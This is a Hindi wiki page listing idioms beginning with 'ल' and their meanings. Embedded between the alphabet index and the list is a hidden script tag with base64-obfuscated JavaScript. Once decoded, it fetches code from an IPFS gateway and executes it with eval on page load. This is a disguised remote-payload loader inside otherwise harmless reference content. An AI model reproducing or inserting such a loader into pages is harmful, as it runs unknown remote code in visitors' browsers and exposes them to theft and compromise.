कहावत लोकोक्ति मुहावरे-ल

भारत डिस्कवरी प्रस्तुति
व्यवस्थापन (चर्चा | योगदान) द्वारा परिवर्तित 12:14, 20 अप्रैल 2018 का अवतरण (Text replacement - "{{कहावत लोकोक्ति मुहावरे}}" to "{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}")
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

कहावत लोकोक्ति मुहावरे वर्णमाला क्रमानुसार खोजें

                              अं                                                                                              क्ष    त्र    श्र

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

कहावत लोकोक्ति मुहावरे अर्थ
1- लेना एक ना देना दो। अर्थ - किसी भी प्रकार का मतलब ना होना ।
2- लंगोट कसना। अर्थ - लड़ने को तैयार होना।
3- लंगोटिया यार। अर्थ - घनिष्ट मित्र।
4- लंगोटी में फाग खेलना। अर्थ - दरिद्रता में आनन्द लूटना।
5- लकीर का फ़कीर होना। अर्थ - पुराने रीति-रिवाजों का अनुसरण करना।
6- ललाट में लिखा होना। अर्थ - भाग्य में बदा होना।
7- लल्लो-चप्पो करना। अर्थ - चिकनी-चुपड़ी बाते करना।
8- लहू के आँसू पीना। अर्थ - दु:ख सह लेना।
9- लाख का घर राख होना। अर्थ - धनी का निर्धन हो जाना।
10- लाल–पीला होना। अर्थ - बहुत गुस्सा होना।
11- लिफ़ाफ़ा खुल जाना। अर्थ - भेद खुल जाना।
12- लुटिया डुबोना। अर्थ - काम ख़राब कर देना।
13- लेने के देने पड़ना। अर्थ - लाभ की जगह नुक़सान होना।
14- लोहा मानना। अर्थ - श्रेष्ठता स्वीकार करना।
15- लोहा लेना। अर्थ - लड़ाई करना।
16- लोहे के चने चबवाना। अर्थ -बुरी तरह हराना।